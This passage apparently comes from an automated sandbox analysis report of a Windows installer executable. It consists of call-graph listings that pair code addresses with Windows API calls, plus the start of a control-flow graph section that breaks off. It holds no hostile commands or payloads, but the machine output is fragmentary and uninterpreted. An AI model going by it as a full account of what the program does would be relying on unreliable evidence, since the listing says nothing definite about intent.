3582 4033c2 GetTickCount 3582->3583 3583->3576 3583->3578 3583->3582 3584 4033e7 MulDiv wsprintfW 3583->3584 3586 4060f9 WriteFile 3583->3586 3585 4055dc 28 API calls 3584->3585 3585->3583 3586->3583 3588 406401 3587->3588 3589 4024bb 3588->3589 3590 40640c RegCreateKeyExW 3588->3590 3589->3553 3589->3554 3589->3555 3590->3589 3592 4060ca ReadFile 3591->3592 3593 40330b 3592->3593 3593->3573 3593->3574 3593->3576 3594->3568 3613 402910 3614 402dab 21 API calls 3613->3614 3615 402917 FindFirstFileW 3614->3615 3616 40293f 3615->3616 3619 40292a 3615->3619 3621 40649e wsprintfW 3616->3621 3618 402948 3622 406557 lstrcpynW 3618->3622 3621->3618 3622->3619 4668 401911 4669 401948 4668->4669 4670 402dab 21 API calls 4669->4670 4671 40194d 4670->4671 4672 405c63 71 API calls 4671->4672 4673 401956 4672->4673 4674 401491 4675 4055dc 28 API calls 4674->4675 4676 401498 4675->4676 4677 401914 4678 402dab 21 API calls 4677->4678 4679 40191b 4678->4679 4680 405bb7 MessageBoxIndirectW 4679->4680 4681 401924 4680->4681 4682 404695 4684 4046ad 4682->4684 4685 4047c7 4682->4685 4683 404831 4686 4048fb 4683->4686 4687 40483b GetDlgItem 4683->4687 4690 4044d6 22 API calls 4684->4690 4685->4683 4685->4686 4692 404802 GetDlgItem SendMessageW 4685->4692 4691 40453d 8 API calls 4686->4691 4688 404855 4687->4688 4689 4048bc 4687->4689 4688->4689 4695 40487b SendMessageW LoadCursorW SetCursor 4688->4695 4689->4686 4696 4048ce 4689->4696 4693 404714 4690->4693 4694 4048f6 4691->4694 4715 4044f8 KiUserCallbackDispatcher 4692->4715 4698 4044d6 22 API calls 4693->4698 4716 404944 4695->4716 4700 4048e4 4696->4700 4701 4048d4 SendMessageW 4696->4701 4703 404721 CheckDlgButton 4698->4703 4700->4694 4706 4048ea SendMessageW 4700->4706 4701->4700 4702 40482c 4707 404920 SendMessageW 4702->4707 4713 4044f8 KiUserCallbackDispatcher 4703->4713 4706->4694 4707->4683 4708 40473f GetDlgItem 4714 40450b SendMessageW 4708->4714 4710 404755 SendMessageW 4711 404772 GetSysColor 4710->4711 4712 40477b SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 4710->4712 4711->4712 4712->4694 4713->4708 4714->4710 4715->4702 4719 405b7d ShellExecuteExW 4716->4719 4718 4048aa LoadCursorW SetCursor 4718->4689 4719->4718 4720 402896 4721 40289d 4720->4721 4724 402bae 4720->4724 4722 402d89 21 API calls 4721->4722 4723 4028a4 4722->4723 4725 4028b3 SetFilePointer 4723->4725 4725->4724 4726 4028c3 4725->4726 4728 40649e wsprintfW 4726->4728 4728->4724 4729 401f17 4730 402dab 21 API calls 4729->4730 4731 401f1d 4730->4731 4732 402dab 21 API calls 4731->4732 4733 401f26 4732->4733 4734 402dab 21 API calls 4733->4734 4735 401f2f 4734->4735 4736 402dab 21 API calls 4735->4736 4737 401f38 4736->4737 4738 401423 28 API calls 4737->4738 4739 401f3f 4738->4739 4746 405b7d ShellExecuteExW 4739->4746 4741 402933 4742 401f87 4742->4741 4743 4069f6 5 API calls 4742->4743 4744 401fa4 CloseHandle 4743->4744 4744->4741 4746->4742 4747 402f98 4748 402fc3 4747->4748 4749 402faa SetTimer 4747->4749 4750 403018 4748->4750 4751 402fdd MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 4748->4751 4749->4748 4751->4750 4156 40571b 4157 4058c5 4156->4157 4158 40573c GetDlgItem GetDlgItem GetDlgItem 4156->4158 4160 4058f6 4157->4160 4161 4058ce GetDlgItem CreateThread CloseHandle 4157->4161 4202 40450b SendMessageW 4158->4202 4163 405921 4160->4163 4164 405946 4160->4164 4165 40590d ShowWindow ShowWindow 4160->4165 4161->4160 4205 4056af 5 API calls 4161->4205 4162 4057ac 4169 4057b3 GetClientRect GetSystemMetrics SendMessageW SendMessageW 4162->4169 4166 405981 4163->4166 4167 40592d 4163->4167 4168 40453d 8 API calls 4164->4168 4204 40450b SendMessageW 4165->4204 4166->4164 4178 40598f SendMessageW 4166->4178 4171 405935 4167->4171 4172 40595b ShowWindow 4167->4172 4173 405954 4168->4173 4176 405821 4169->4176 4177 405805 SendMessageW SendMessageW 4169->4177 4179 4044af SendMessageW 4171->4179 4174 40597b 4172->4174 4175 40596d 4172->4175 4181 4044af SendMessageW 4174->4181 4180 4055dc 28 API calls 4175->4180 4182 405834 4176->4182 4183 405826 SendMessageW 4176->4183 4177->4176 4178->4173 4184 4059a8 CreatePopupMenu 4178->4184 4179->4164 4180->4174 4181->4166 4186 4044d6 22 API calls 4182->4186 4183->4182 4185 406594 21 API calls 4184->4185 4187 4059b8 AppendMenuW 4185->4187 4188 405844 4186->4188 4189 4059d5 GetWindowRect 4187->4189 4190 4059e8 TrackPopupMenu 4187->4190 4191 405881 GetDlgItem SendMessageW 4188->4191 4192 40584d ShowWindow 4188->4192 4189->4190 4190->4173 4194 405a03 4190->4194 4191->4173 4193 4058a8 SendMessageW SendMessageW 4191->4193 4195 405870 4192->4195 4196 405863 ShowWindow 4192->4196 4193->4173 4197 405a1f SendMessageW 4194->4197 4203 40450b SendMessageW 4195->4203 4196->4195 4197->4197 4198 405a3c OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 4197->4198 4200 405a61 SendMessageW 4198->4200 4200->4200 4201 405a8a GlobalUnlock SetClipboardData CloseClipboard 4200->4201 4201->4173 4202->4162 4203->4191 4204->4163 4752 6ff6102d 4753 6ff61096 71 API calls 4752->4753 4754 6ff61058 4753->4754 4755 401d1c 4756 402d89 21 API calls 4755->4756 4757 401d22 IsWindow 4756->4757 4758 401a25 4757->4758 4759 404d1d 4760 404d49 4759->4760 4761 404d2d 4759->4761 4763 404d7c 4760->4763 4764 404d4f SHGetPathFromIDListW 4760->4764 4770 405b9b GetDlgItemTextW 4761->4770 4766 404d66 SendMessageW 4764->4766 4767 404d5f 4764->4767 4765 404d3a SendMessageW 4765->4760 4766->4763 4769 40140b 2 API calls 4767->4769 4769->4766 4770->4765 4771 40149e 4772 4023a2 4771->4772 4773 4014ac PostQuitMessage 4771->4773 4773->4772 3185 401ba0 3186 401bf1 3185->3186 3187 401bad 3185->3187 3189 401bf6 3186->3189 3190 401c1b GlobalAlloc 3186->3190 3188 401c36 3187->3188 3193 401bc4 3187->3193 3192 406594 21 API calls 3188->3192 3200 4023a2 3188->3200 3189->3200 3223 406557 lstrcpynW 3189->3223 3204 406594 3190->3204 3194 40239c 3192->3194 3221 406557 lstrcpynW 3193->3221 3224 405bb7 3194->3224 3197 401c08 GlobalFree 3197->3200 3199 401bd3 3222 406557 lstrcpynW 3199->3222 3202 401be2 3228 406557 lstrcpynW 3202->3228 3208 40659f 3204->3208 3205 4067e6 3206 4067ff 3205->3206 3251 406557 lstrcpynW 3205->3251 3206->3188 3208->3205 3209 4067b7 lstrlenW 3208->3209 3211 4066b0 GetSystemDirectoryW 3208->3211 3212 406594 15 API calls 3208->3212 3215 4066c6 GetWindowsDirectoryW 3208->3215 3216 406594 15 API calls 3208->3216 3217 406758 lstrcatW 3208->3217 3220 406728 SHGetPathFromIDListW CoTaskMemFree 3208->3220 3229 406425 3208->3229 3234 40694b GetModuleHandleA 3208->3234 3240 406805 3208->3240 3249 40649e wsprintfW 3208->3249 3250 406557 lstrcpynW 3208->3250 3209->3208 3211->3208 3212->3209 3215->3208 3216->3208 3217->3208 3220->3208 3221->3199 3222->3202 3223->3197 3225 405bcc 3224->3225 3226 405be0 MessageBoxIndirectW 3225->3226 3227 405c18 3225->3227 3226->3227 3227->3200 3228->3200 3252 4063c4 3229->3252 3232 406489 3232->3208 3233 406459 RegQueryValueExW RegCloseKey 3233->3232 3235 406971 GetProcAddress 3234->3235 3236 406967 3234->3236 3237 406980 3235->3237 3256 4068db GetSystemDirectoryW 3236->3256 3237->3208 3239 40696d 3239->3235 3239->3237 3241 406812 3240->3241 3243 406888 3241->3243 3244 40687b CharNextW 3241->3244 3247 406867 CharNextW 3241->3247 3248 406876 CharNextW 3241->3248 3259 405e53 3241->3259 3242 40688d CharPrevW 3242->3243 3243->3242 3245 4068ae 3243->3245 3244->3241 3244->3243 3245->3208 3247->3241 3248->3244 3249->3208 3250->3208 3251->3206 3253 4063d3 3252->3253 3254 4063d7 3253->3254 3255 4063dc RegOpenKeyExW 3253->3255 3254->3232 3254->3233 3255->3254 3257 4068fd wsprintfW LoadLibraryExW 3256->3257 3257->3239 3260 405e59 3259->3260 3261 405e6f 3260->3261 3262 405e60 CharNextW 3260->3262 3261->3241 3262->3260 4774 402621 4775 402dab 21 API calls 4774->4775 4776 402628 4775->4776 4779 406047 GetFileAttributesW CreateFileW 4776->4779 4778 402634 4779->4778 3279 4025a3 3291 402deb 3279->3291 3283 4025b6 3284 4025c5 3283->3284 3289 402933 3283->3289 3285 4025d2 RegEnumKeyW 3284->3285 3286 4025de RegEnumValueW 3284->3286 3287 4025fa RegCloseKey 3285->3287 3286->3287 3288 4025f3 3286->3288 3287->3289 3288->3287 3292 402dab 21 API calls 3291->3292 3293 402e02 3292->3293 3294 4063c4 RegOpenKeyExW 3293->3294 3295 4025ad 3294->3295 3296 402d89 3295->3296 3297 406594 21 API calls 3296->3297 3298 402d9e 3297->3298 3298->3283 3511 4015a8 3512 402dab 21 API calls 3511->3512 3513 4015af SetFileAttributesW 3512->3513 3514 4015c1 3513->3514 3515 401fa9 3516 402dab 21 API calls 3515->3516 3517 401faf 3516->3517 3518 4055dc 28 API calls 3517->3518 3519 401fb9 3518->3519 3530 405b3a CreateProcessW 3519->3530 3522 401fe2 CloseHandle 3526 402933 3522->3526 3525 401fd4 3527 401fe4 3525->3527 3528 401fd9 3525->3528 3527->3522 3538 40649e wsprintfW 3528->3538 3531 401fbf 3530->3531 3532 405b6d CloseHandle 3530->3532 3531->3522 3531->3526 3533 4069f6 WaitForSingleObject 3531->3533 3532->3531 3534 406a10 3533->3534 3535 406a22 GetExitCodeProcess 3534->3535 3539 406987 3534->3539 3535->3525 3538->3522 3540 4069a4 PeekMessageW 3539->3540 3541 4069b4 WaitForSingleObject 3540->3541 3542 40699a DispatchMessageW 3540->3542 3541->3534 3542->3540 4780 401a2d lstrcmpW 4781 401a21 4780->4781 3595 40202f 3596 402dab 21 API calls 3595->3596 3597 402036 3596->3597 3598 40694b 5 API calls 3597->3598 3599 402045 GetFileVersionInfoSizeW 3598->3599 3600 402061 GlobalAlloc 3599->3600 3601 402c2f 3599->3601 3600->3601 3602 402075 3600->3602 3603 40694b 5 API calls 3602->3603 3604 40207c 3603->3604 3605 40694b 5 API calls 3604->3605 3606 402086 3605->3606 3610 4020d1 3606->3610 3611 40649e wsprintfW 3606->3611 3608 4020bf 3612 40649e wsprintfW 3608->3612 3610->3601 3611->3608 3612->3610 4782 40252f 4783 402deb 21 API calls 4782->4783 4784 402539 4783->4784 4785 402dab 21 API calls 4784->4785 4786 402542 4785->4786 4787 40254d RegQueryValueExW 4786->4787 4792 402933 4786->4792 4788 402573 RegCloseKey 4787->4788 4789 40256d 4787->4789 4788->4792 4789->4788 4793 40649e wsprintfW 4789->4793 4793->4788 4794 4021af 4795 402dab 21 API calls 4794->4795 4796 4021b6 4795->4796 4797 402dab 21 API calls 4796->4797 4798 4021c0 4797->4798 4799 402dab 21 API calls 4798->4799 4800 4021ca 4799->4800 4801 402dab 21 API calls 4800->4801 4802 4021d4 4801->4802 4803 402dab 21 API calls 4802->4803 4804 4021de 4803->4804 4805 40221d CoCreateInstance 4804->4805 4806 402dab 21 API calls 4804->4806 4809 40223c 4805->4809 4806->4805 4807 401423 28 API calls 4808 4022fb 4807->4808 4809->4807 4809->4808 3623 403532 SetErrorMode GetVersionExW 3624 403586 GetVersionExW 3623->3624 3625 4035be 3623->3625 3624->3625 3626 403615 3625->3626 3627 40694b 5 API calls 3625->3627 3628 4068db 3 API calls 3626->3628 3627->3626 3629 40362b lstrlenA 3628->3629 3629->3626 3630 40363b 3629->3630 3631 40694b 5 API calls 3630->3631 3632 403642 3631->3632 3633 40694b 5 API calls 3632->3633 3634 403649 3633->3634 3635 40694b 5 API calls 3634->3635 3636 403655 #17 OleInitialize SHGetFileInfoW 3635->3636 3711 406557 lstrcpynW 3636->3711 3639 4036a4 GetCommandLineW 3712 406557 lstrcpynW 3639->3712 3641 4036b6 3642 405e53 CharNextW 3641->3642 3643 4036dc CharNextW 3642->3643 3649 4036ee 3643->3649 3644 4037f0 3645 403804 GetTempPathW 3644->3645 3713 403501 3645->3713 3647 40381c 3650 403820 GetWindowsDirectoryW lstrcatW 3647->3650 3651 403876 DeleteFileW 3647->3651 3648 405e53 CharNextW 3648->3649 3649->3644 3649->3648 3657 4037f2 3649->3657 3653 403501 12 API calls 3650->3653 3723 403082 GetTickCount GetModuleFileNameW 3651->3723 3654 40383c 3653->3654 3654->3651 3656 403840 GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 3654->3656 3655 40388a 3663 405e53 CharNextW 3655->3663 3694 403931 3655->3694 3702 403941 3655->3702 3658 403501 12 API calls 3656->3658 3807 406557 lstrcpynW 3657->3807 3661 40386e 3658->3661 3661->3651 3661->3702 3667 4038a9 3663->3667 3665 403ab3 3669 403b37 ExitProcess 3665->3669 3670 403abb GetCurrentProcess OpenProcessToken 3665->3670 3666 403a8f 3668 405bb7 MessageBoxIndirectW 3666->3668 3671 403907 3667->3671 3672 40394a 3667->3672 3674 403a9d ExitProcess 3668->3674 3675 403ad3 LookupPrivilegeValueW AdjustTokenPrivileges 3670->3675 3676 403b07 3670->3676 3677 405f2e 18 API calls 3671->3677 3678 405b22 5 API calls 3672->3678 3675->3676 3679 40694b 5 API calls 3676->3679 3681 403913 3677->3681 3682 40394f lstrlenW 3678->3682 3680 403b0e 3679->3680 3683 403b23 ExitWindowsEx 3680->3683 3686 403b30 3680->3686 3681->3702 3808 406557 lstrcpynW 3681->3808 3810 406557 lstrcpynW 3682->3810 3683->3669 3683->3686 3685 403969 3688 403981 3685->3688 3811 406557 lstrcpynW 3685->3811 3819 40140b 3686->3819 3693 4039a7 wsprintfW 3688->3693 3708 4039d3 3688->3708 3690 403926 3809 406557 lstrcpynW 3690->3809 3695 406594 21 API calls 3693->3695 3751 403c29 3694->3751 3695->3688 3696 405aab 2 API calls 3696->3708 3697 405b05 2 API calls 3697->3708 3698 4039e3 GetFileAttributesW 3701 4039ef DeleteFileW 3698->3701 3698->3708 3699 403a1d SetCurrentDirectoryW 3700 406317 40 API calls 3699->3700 3703 403a2c CopyFileW 3700->3703 3701->3708 3812 403b4f 3702->3812 3703->3702 3703->3708 3704 405c63 71 API calls 3704->3708 3705 406317 40 API calls 3705->3708 3706 406594 21 API calls 3706->3708 3707 405b3a 2 API calls 3707->3708 3708->3688 3708->3693 3708->3696 3708->3697 3708->3698 3708->3699 3708->3702 3708->3704 3708->3705 3708->3706 3708->3707 3709 403aa5 CloseHandle 3708->3709 3710 4068b4 2 API calls 3708->3710 3709->3702 3710->3708 3711->3639 3712->3641 3714 406805 5 API calls 3713->3714 3715 40350d 3714->3715 3716 403517 3715->3716 3717 405e26 3 API calls 3715->3717 3716->3647 3718 40351f 3717->3718 3719 405b05 2 API calls 3718->3719 3720 403525 3719->3720 3721 406076 2 API calls 3720->3721 3722 403530 3721->3722 3722->3647 3822 406047 GetFileAttributesW CreateFileW 3723->3822 3725 4030c2 3746 4030d2 3725->3746 3823 406557 lstrcpynW 3725->3823 3727 4030e8 3728 405e72 2 API calls 3727->3728 3729 4030ee 3728->3729 3824 406557 lstrcpynW 3729->3824 3731 4030f9 GetFileSize 3732 4031f3 3731->3732 3743 403110 3731->3743 3825 40301e 3732->3825 3734 4031fc 3736 40322c GlobalAlloc 3734->3736 3734->3746 3837 4034ea SetFilePointer 3734->3837 3735 4034d4 ReadFile 3735->3743 3836 4034ea SetFilePointer 3736->3836 3737 40325f 3741 40301e 6 API calls 3737->3741 3740 403247 3745 4032b9 35 API calls 3740->3745 3741->3746 3742 403215 3744 4034d4 ReadFile 3742->3744 3743->3732 3743->3735 3743->3737 3743->3746 3747 40301e 6 API calls 3743->3747 3748 403220 3744->3748 3749 403253 3745->3749 3746->3655 3747->3743 3748->3736 3748->3746 3749->3746 3749->3749 3750 403290 SetFilePointer 3749->3750 3750->3746 3752 40694b 5 API calls 3751->3752 3753 403c3d 3752->3753 3754 403c43 3753->3754 3755 403c55 3753->3755 3853 40649e wsprintfW 3754->3853 3756 406425 3 API calls 3755->3756 3757 403c85 3756->3757 3758 403ca4 lstrcatW 3757->3758 3760 406425 3 API calls 3757->3760 3761 403c53 3758->3761 3760->3758 3838 403eff 3761->3838 3764 405f2e 18 API calls 3765 403cd6 3764->3765 3766 403d6a 3765->3766 3768 406425 3 API calls 3765->3768 3767 405f2e 18 API calls 3766->3767 3769 403d70 3767->3769 3771 403d08 3768->3771 3770 403d80 LoadImageW 3769->3770 3772 406594 21 API calls 3769->3772 3773 403e26 3770->3773 3774 403da7 RegisterClassW 3770->3774 3771->3766 3775 403d29 lstrlenW 3771->3775 3779 405e53 CharNextW 3771->3779 3772->3770 3778 40140b 2 API calls 3773->3778 3776 403e30 3774->3776 3777 403ddd SystemParametersInfoW CreateWindowExW 3774->3777 3780 403d37 lstrcmpiW 3775->3780 3781 403d5d 3775->3781 3776->3702 3777->3773 3782 403e2c 3778->3782 3783 403d26 3779->3783 3780->3781 3784 403d47 GetFileAttributesW 3780->3784 3785 405e26 3 API calls 3781->3785 3782->3776 3787 403eff 22 API calls 3782->3787 3783->3775 3786 403d53 3784->3786 3788 403d63 3785->3788 3786->3781 3789 405e72 2 API calls 3786->3789 3790 403e3d 3787->3790 3854 406557 lstrcpynW 3788->3854 3789->3781 3792 403e49 ShowWindow 3790->3792 3793 403ecc 3790->3793 3795 4068db 3 API calls 3792->3795 3846 4056af OleInitialize 3793->3846 3797 403e61 3795->3797 3796 403ed2 3798 403ed6 3796->3798 3799 403eee 3796->3799 3800 403e6f GetClassInfoW 3797->3800 3802 4068db 3 API calls 3797->3802 3798->3776 3806 40140b 2 API calls 3798->3806 3801 40140b 2 API calls 3799->3801 3803 403e83 GetClassInfoW RegisterClassW 3800->3803 3804 403e99 DialogBoxParamW 3800->3804 3801->3776 3802->3800 3803->3804 3805 40140b 2 API calls 3804->3805 3805->3776 3806->3776 3807->3645 3808->3690 3809->3694 3810->3685 3811->3688 3813 403b67 3812->3813 3814 403b59 CloseHandle 3812->3814 3866 403b94 3813->3866 3814->3813 3817 405c63 71 API calls 3818 403a82 OleUninitialize 3817->3818 3818->3665 3818->3666 3820 401389 2 API calls 3819->3820 3821 401420 3820->3821 3821->3669 3822->3725 3823->3727 3824->3731 3826 403027 3825->3826 3827 40303f 3825->3827 3828 403030 DestroyWindow 3826->3828 3829 403037 3826->3829 3830 403047 3827->3830 3831 40304f GetTickCount 3827->3831 3828->3829 3829->3734 3832 406987 2 API calls 3830->3832 3833 403080 3831->3833 3834 40305d CreateDialogParamW ShowWindow 3831->3834 3835 40304d 3832->3835 3833->3734 3834->3833 3835->3734 3836->3740 3837->3742 3839 403f13 3838->3839 3855 40649e wsprintfW 3839->3855 3841 403f84 3856 403fb8 3841->3856 3843 403cb4 3843->3764 3844 403f89 3844->3843 3845 406594 21 API calls 3844->3845 3845->3844 3859 404522 3846->3859 3848 4056f9 3849 404522 SendMessageW 3848->3849 3851 40570b OleUninitialize 3849->3851 3850 4056d2 3850->3848 3862 401389 3850->3862 3851->3796 3853->3761 3854->3766 3855->3841 3857 406594 21 API calls 3856->3857 3858 403fc6 SetWindowTextW 3857->3858 3858->3844 3860 40453a 3859->3860 3861 40452b SendMessageW 3859->3861 3860->3850 3861->3860 3864 401390 3862->3864 3863 4013fe 3863->3850 3864->3863 3865 4013cb MulDiv SendMessageW 3864->3865 3865->3864 3867 403ba2 3866->3867 3868 403b6c 3867->3868 3869 403ba7 FreeLibrary GlobalFree 3867->3869 3868->3817 3869->3868 3869->3869 4810 401a35 4811 402dab 21 API calls 4810->4811 4812 401a3e ExpandEnvironmentStringsW 4811->4812 4813 401a52 4812->4813 4815 401a65 4812->4815 4814 401a57 lstrcmpW 4813->4814 4813->4815 4814->4815 3911 6ff61000 3914 6ff61096 3911->3914 3992 6ff61987 GetCurrentProcess GetModuleHandleA GetProcAddress 3914->3992 3917 6ff6122d GlobalAlloc 3919 6ff61247 3917->3919 3918 6ff610e8 GetModuleFileNameW GlobalAlloc 3920 6ff6112f 3918->3920 3921 6ff6125f FindWindowExW FindWindowExW 3919->3921 3935 6ff6127e 3919->3935 3922 6ff61135 CharPrevW 3920->3922 3923 6ff6114f 3920->3923 3921->3935 3922->3920 3922->3923 3924 6ff6116f GetTempFileNameW 3923->3924 3925 6ff61159 3923->3925 3929 6ff6119e 3924->3929 4008 6ff61c8c 3925->4008 3932 6ff6120b lstrcatW lstrlenW 3929->3932 3933 6ff611b6 CreateFileMappingW MapViewOfFile 3929->3933 3931 6ff6102b 3932->3919 3936 6ff611d7 UnmapViewOfFile 3933->3936 3937 6ff611fd CloseHandle CloseHandle 3933->3937 3934 6ff612aa lstrcmpiW 3934->3935 3938 6ff612bf lstrcmpiW 3934->3938 3935->3934 3997 6ff61c4c 3935->3997 4002 6ff61a61 lstrlenW lstrlenW 3935->4002 3936->3937 3937->3932 3938->3935 3939 6ff612d7 3938->3939 3940 6ff612dc 3939->3940 3941 6ff61308 GetVersion 3939->3941 3942 6ff61c8c 2 API calls 3940->3942 3943 6ff613c7 3941->3943 3944 6ff61390 GlobalAlloc 3941->3944 3948 6ff612e6 3942->3948 3946 6ff613d5 InitializeSecurityDescriptor SetSecurityDescriptorDacl 3943->3946 3947 6ff613fe CreatePipe 3943->3947 3951 6ff61484 lstrcpyW 3944->3951 3952 6ff613c4 3944->3952 3946->3947 3950 6ff61417 CreatePipe 3947->3950 3947->3951 3955 6ff612f7 DeleteFileW 3948->3955 3956 6ff61300 3948->3956 3950->3951 3953 6ff6142a GetStartupInfoW CreateProcessW 3950->3953 3954 6ff6175f 3951->3954 3952->3943 3953->3951 3959 6ff6149b GetTickCount 3953->3959 3957 6ff61767 3954->3957 3958 6ff6176f 3954->3958 3955->3956 3956->3941 3960 6ff61c8c 2 API calls 3957->3960 3961 6ff61787 3958->3961 3963 6ff6177c 3958->3963 3962 6ff614a4 WaitForSingleObject GetExitCodeProcess 3959->3962 3960->3958 3964 6ff617a2 3961->3964 3965 6ff61790 lstrcpyW 3961->3965 3966 6ff614c4 PeekNamedPipe 3962->3966 3967 6ff61a01 3 API calls 3963->3967 3968 6ff617c3 3964->3968 3969 6ff617ab wsprintfW 3964->3969 3965->3964 3970 6ff614de GetTickCount ReadFile 3966->3970 3971 6ff6170a 3966->3971 3972 6ff61785 3967->3972 3973 6ff61c8c 2 API calls 3968->3973 3969->3968 3991 6ff61520 3970->3991 3971->3954 3974 6ff61716 GetTickCount 3971->3974 3975 6ff6174a Sleep 3971->3975 3972->3961 3976 6ff617cf 6 API calls 3973->3976 3974->3975 3979 6ff61725 TerminateProcess lstrcpyW 3974->3979 3975->3962 3978 6ff617fe 3976->3978 3977 6ff61524 IsTextUnicode 3977->3991 3980 6ff61807 DeleteFileW 3978->3980 3981 6ff61810 GlobalFree 3978->3981 3979->3962 3980->3981 3981->3931 3982 6ff61820 GlobalFree 3981->3982 3982->3931 3983 6ff61597 IsDBCSLeadByteEx 3984 6ff615b6 MultiByteToWideChar 3983->3984 3983->3991 3984->3991 3985 6ff615ec lstrcpyW 3985->3991 3986 6ff61672 GlobalReAlloc 3987 6ff616ec lstrcpyW 3986->3987 3986->3991 3987->3962 3991->3962 3991->3966 3991->3977 3991->3983 3991->3984 3991->3985 3991->3986 4011 6ff61a01 3991->4011 4014 6ff6182a 3991->4014 4018 6ff61948 3991->4018 3993 6ff619c3 3992->3993 3994 6ff619dd GetProcAddress 3992->3994 3993->3994 3995 6ff610e0 3993->3995 3994->3995 3996 6ff619ec 3994->3996 3995->3917 3995->3918 3996->3995 3998 6ff61c56 3997->3998 3999 6ff61c85 3997->3999 3998->3999 4000 6ff61c76 GlobalFree 3998->4000 4001 6ff61c63 lstrcpyW 3998->4001 3999->3935 4000->3999 4001->4000 4003 6ff61abc 4002->4003 4007 6ff61a82 4002->4007 4003->3935 4004 6ff61a8d lstrcmpiW 4004->4003 4004->4007 4007->4004 4021 6ff618cc 4007->4021 4009 6ff61c95 GlobalAlloc lstrcpynW 4008->4009 4010 6ff61163 GlobalFree 4008->4010 4009->4010 4010->3931 4012 6ff61a13 SendMessageW SendMessageW SendMessageW 4011->4012 4013 6ff61a5e 4011->4013 4012->4013 4013->3991 4015 6ff6189d 4014->4015 4016 6ff61837 4014->4016 4015->3991 4016->4015 4017 6ff618cc CharNextW 4016->4017 4017->4016 4019 6ff61981 4018->4019 4020 6ff61953 CharNextExA 4018->4020 4019->3991 4020->4019 4022 6ff618da lstrlenW 4021->4022 4024 6ff618de 4021->4024 4022->4003 4022->4007 4023 6ff61925 CharNextW 4023->4022 4024->4022 4024->4023 4821 4023b7 4822 4023c5 4821->4822 4823 4023bf 4821->4823 4825 4023d3 4822->4825 4826 402dab 21 API calls 4822->4826 4824 402dab 21 API calls 4823->4824 4824->4822 4827 4023e1 4825->4827 4829 402dab 21 API calls 4825->4829 4826->4825 4828 402dab 21 API calls 4827->4828 4830 4023ea WritePrivateProfileStringW 4828->4830 4829->4827 4831 4014b8 4832 4014be 4831->4832 4833 401389 2 API calls 4832->4833 4834 4014c6 4833->4834 4121 402439 4122 402441 4121->4122 4123 40246c 4121->4123 4125 402deb 21 API calls 4122->4125 4124 402dab 21 API calls 4123->4124 4126 402473 4124->4126 4127 402448 4125->4127 4133 402e69 4126->4133 4129 402452 4127->4129 4130 402480 4127->4130 4131 402dab 21 API calls 4129->4131 4132 402459 RegDeleteValueW RegCloseKey 4131->4132 4132->4130 4134 402e76 4133->4134 4135 402e7d 4133->4135 4134->4130 4135->4134 4137 402eae 4135->4137 4138 4063c4 RegOpenKeyExW 4137->4138 4139 402edc 4138->4139 4140 402f91 4139->4140 4141 402ee6 4139->4141 4140->4134 4142 402eec RegEnumValueW 4141->4142 4146 402f0f 4141->4146 4143 402f76 RegCloseKey 4142->4143 4142->4146 4143->4140 4144 402f4b RegEnumKeyW 4145 402f54 RegCloseKey 4144->4145 4144->4146 4147 40694b 5 API calls 4145->4147 4146->4143 4146->4144 4146->4145 4148 402eae 6 API calls 4146->4148 4149 402f64 4147->4149 4148->4146 4150 402f86 4149->4150 4151 402f68 RegDeleteKeyW 4149->4151 4150->4140 4151->4140 4152 40173a 4153 402dab 21 API calls 4152->4153 4154 401741 SearchPathW 4153->4154 4155 40175c 4154->4155 4835 401d3d 4836 402d89 21 API calls 4835->4836 4837 401d44 4836->4837 4838 402d89 21 API calls 4837->4838 4839 401d50 GetDlgItem 4838->4839 4840 40263d 4839->4840

                                                              Executed Functions

                                                              Function 6FF61096 Relevance: 116.1, APIs: 56, Strings: 10, Instructions: 627filestringmemoryCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 0 6ff61096-6ff610e2 call 6ff61987 3 6ff6122d-6ff61244 GlobalAlloc 0->3 4 6ff610e8-6ff6112c GetModuleFileNameW GlobalAlloc 0->4 5 6ff61247-6ff6125d 3->5 6 6ff6112f-6ff61133 4->6 7 6ff6127e 5->7 8 6ff6125f-6ff61279 FindWindowExW * 2 5->8 9 6ff61135-6ff6114d CharPrevW 6->9 10 6ff6114f-6ff61157 6->10 11 6ff61284-6ff61299 call 6ff61c4c call 6ff61a61 7->11 8->7 9->6 9->10 12 6ff6116f-6ff611a0 GetTempFileNameW 10->12 13 6ff61159-6ff6116a call 6ff61c8c GlobalFree 10->13 25 6ff612aa-6ff612b4 lstrcmpiW 11->25 26 6ff6129b-6ff612a8 call 6ff61ac7 11->26 21 6ff611a2-6ff611d5 CreateFileMappingW MapViewOfFile 12->21 22 6ff6120b-6ff6122b lstrcatW lstrlenW 12->22 20 6ff61825-6ff61829 13->20 27 6ff611d7-6ff611f7 UnmapViewOfFile 21->27 28 6ff611fd-6ff61205 CloseHandle * 2 21->28 22->5 29 6ff612b6-6ff612bd 25->29 30 6ff612bf-6ff612c9 lstrcmpiW 25->30 32 6ff612d2-6ff612d5 26->32 27->28 28->22 29->32 33 6ff612d7-6ff612da 30->33 34 6ff612cb 30->34 32->11 36 6ff612dc-6ff612ec call 6ff61c8c 33->36 37 6ff61308-6ff6138e GetVersion 33->37 34->32 49 6ff612f2-6ff612f5 36->49 50 6ff612ee 36->50 39 6ff613c7-6ff613d3 37->39 40 6ff61390-6ff61393 37->40 43 6ff613d5-6ff613fb InitializeSecurityDescriptor SetSecurityDescriptorDacl 39->43 44 6ff613fe-6ff61415 CreatePipe 39->44 41 6ff61395-6ff6139c 40->41 42 6ff6139e 40->42 46 6ff613a3-6ff613be GlobalAlloc 41->46 42->46 43->44 47 6ff61417-6ff61428 CreatePipe 44->47 48 6ff61484-6ff61496 lstrcpyW 44->48 46->48 51 6ff613c4 46->51 47->48 52 6ff6142a-6ff61482 GetStartupInfoW CreateProcessW 47->52 53 6ff61762-6ff61765 48->53 54 6ff612f7-6ff612fa DeleteFileW 49->54 55 6ff61300 49->55 50->49 51->39 52->48 58 6ff6149b-6ff614a1 GetTickCount 52->58 56 6ff61767-6ff6176a call 6ff61c8c 53->56 57 6ff6176f-6ff61772 53->57 54->55 55->37 56->57 60 6ff61787-6ff6178e 57->60 61 6ff61774-6ff6177a 57->61 62 6ff614a4-6ff614be WaitForSingleObject GetExitCodeProcess 58->62 64 6ff617a2-6ff617a9 60->64 65 6ff61790-6ff6179c lstrcpyW 60->65 61->60 63 